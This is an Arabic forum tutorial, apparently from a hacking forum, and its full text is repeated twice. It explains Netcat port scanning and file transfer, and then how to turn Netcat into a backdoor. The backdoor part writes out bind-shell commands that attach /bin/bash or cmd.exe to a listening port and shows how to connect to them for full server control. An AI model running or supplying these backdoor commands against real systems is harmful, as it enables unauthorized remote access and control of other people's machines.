RxR
26-03-2010, 11:45 PM
السلام عليكم ورحمة الله وبركاته
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات]
من أفضل الأدوات التي عرفها الـ Hackers تقوم هذه الأداة
بارسال واستقبال البيانات باستعمال الـ TCP & UDP Protocols
وهي بالمرتبة الرابعة في قائمة Top 100 Network Security Tools ([فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات]) استخدامات الـ Netcat متعددة وخطيرة فتستطيع استعمالها لكثير من الأمور منها
- فحص المنافذ المفتوحة في السرفر
- نقل الملفات بين جهازك والسيرفر
- جعل الـ Netcat تعمل كـ Backdoor
فحص المنافذ المفتوحة في السرفر
تستطيع أداة الـ Netcat فحص المنافذ المفتوحة بالسيرفر ولكن الـ Nmap
أفضل وأسرع منها في ذلك، وللقيام بهذه العملية نستعمل الأمر:
nc -v -w1 SERVER-IP -z FromPort-ToPort
أما بالنسبة للخيارات التي استخدمناها
-v لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
-w لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
-z تستعمل في عملية فحص المنافذ
مثال على ذلك
nc -v -w1 8.8.8.8 -z 1-100
ولفحص أكثر من نطاق منافذ نستعمل الأمر
nc -v -w1 -z 8.8.8.8 -z 1-100 400-500
ملاحظة: 8.8.8.8 هو IP تلقائي (من عندي)
نقل الملفات بين جهازك والسيرفر
من ميزات الـ Netcat أنها تستطيع نقل الملفات بين جهازين
وللقيام بهذه العملية نطبق الأمر في الجهاز المرسل
nc SERVER-IP PORT < FILE
ونطبق الأمر في الجهاز المستقبل
nc -l -p PORT > FILE
مثال لارسال ملف اسمه data.txt عن طريق البورت 5555 مثلا
nc 192.168.1.2 5555 < data.txt
أما بالنسبة لاستقبال ملف data.txt عن طريق المنفذ 5555 ننفذ الأمر
nc -l -p 5555 > data.txt
جعل الـ Netcat تعمل كـ Backdoor
هذه أخطر استعمالات الـ Netcat لأنه يشكل خطورة على الجهاز و السيرفر بشكل عام
حيث تمتاز أداة الـ Netcat بخاصية ارسال البيانات الى برنامج معين مثل cmd.exe
في ويندوز و /bin/bash في لينوكس مما يجعلك تستطيع تطبيق أوامر على السيرفر
والتحكم به بشكل كامل يتم تنفيذ هذه الخاصية باستعمال الأمر
nc -l -p PORT -e PROGRAM
مع اضافة -d و -L في ويندوز ليصبح الأمر
nc -l -p PORT -d -e PROGRAM -L
مثال على هذه الخاصية نقوم بتطبيق الأمر
nc -l -p 4455 -e /bin/bash
على السيرفر اذا كان السيرفر ويندوز نطبق نفس الأمر مع اضافة -L و -d مع القيام بتغيير
الـ /bin/bash الى cmd.exe ليصبح الأمر بالشكل
nc -l -p 4455 -e -d cmd.exe -L
وللاتصال بالسيرفر نطبق الأمر
nc -v -n SERVER-IP 4455
وبهذه الطريقة نستطيع ارسال أوامر للتحكم بالسيرفر ولمعرفة جميع خصائص هذه الأداة نفذ الأمر
nc -h
تحميل أداة Netcat لنظام لينوكس ([فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات])
تحميل أداة Netcat لنظام ويندوز ([فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات])
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات]
من أفضل الأدوات التي عرفها الـ Hackers تقوم هذه الأداة
بارسال واستقبال البيانات باستعمال الـ TCP & UDP Protocols
وهي بالمرتبة الرابعة في قائمة Top 100 Network Security Tools ([فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات]) استخدامات الـ Netcat متعددة وخطيرة فتستطيع استعمالها لكثير من الأمور منها
- فحص المنافذ المفتوحة في السرفر
- نقل الملفات بين جهازك والسيرفر
- جعل الـ Netcat تعمل كـ Backdoor
فحص المنافذ المفتوحة في السرفر
تستطيع أداة الـ Netcat فحص المنافذ المفتوحة بالسيرفر ولكن الـ Nmap
أفضل وأسرع منها في ذلك، وللقيام بهذه العملية نستعمل الأمر:
nc -v -w1 SERVER-IP -z FromPort-ToPort
أما بالنسبة للخيارات التي استخدمناها
-v لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
-w لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
-z تستعمل في عملية فحص المنافذ
مثال على ذلك
nc -v -w1 8.8.8.8 -z 1-100
ولفحص أكثر من نطاق منافذ نستعمل الأمر
nc -v -w1 -z 8.8.8.8 -z 1-100 400-500
ملاحظة: 8.8.8.8 هو IP تلقائي (من عندي)
نقل الملفات بين جهازك والسيرفر
من ميزات الـ Netcat أنها تستطيع نقل الملفات بين جهازين
وللقيام بهذه العملية نطبق الأمر في الجهاز المرسل
nc SERVER-IP PORT < FILE
ونطبق الأمر في الجهاز المستقبل
nc -l -p PORT > FILE
مثال لارسال ملف اسمه data.txt عن طريق البورت 5555 مثلا
nc 192.168.1.2 5555 < data.txt
أما بالنسبة لاستقبال ملف data.txt عن طريق المنفذ 5555 ننفذ الأمر
nc -l -p 5555 > data.txt
جعل الـ Netcat تعمل كـ Backdoor
هذه أخطر استعمالات الـ Netcat لأنه يشكل خطورة على الجهاز و السيرفر بشكل عام
حيث تمتاز أداة الـ Netcat بخاصية ارسال البيانات الى برنامج معين مثل cmd.exe
في ويندوز و /bin/bash في لينوكس مما يجعلك تستطيع تطبيق أوامر على السيرفر
والتحكم به بشكل كامل يتم تنفيذ هذه الخاصية باستعمال الأمر
nc -l -p PORT -e PROGRAM
مع اضافة -d و -L في ويندوز ليصبح الأمر
nc -l -p PORT -d -e PROGRAM -L
مثال على هذه الخاصية نقوم بتطبيق الأمر
nc -l -p 4455 -e /bin/bash
على السيرفر اذا كان السيرفر ويندوز نطبق نفس الأمر مع اضافة -L و -d مع القيام بتغيير
الـ /bin/bash الى cmd.exe ليصبح الأمر بالشكل
nc -l -p 4455 -e -d cmd.exe -L
وللاتصال بالسيرفر نطبق الأمر
nc -v -n SERVER-IP 4455
وبهذه الطريقة نستطيع ارسال أوامر للتحكم بالسيرفر ولمعرفة جميع خصائص هذه الأداة نفذ الأمر
nc -h
تحميل أداة Netcat لنظام لينوكس ([فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات])
تحميل أداة Netcat لنظام ويندوز ([فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات])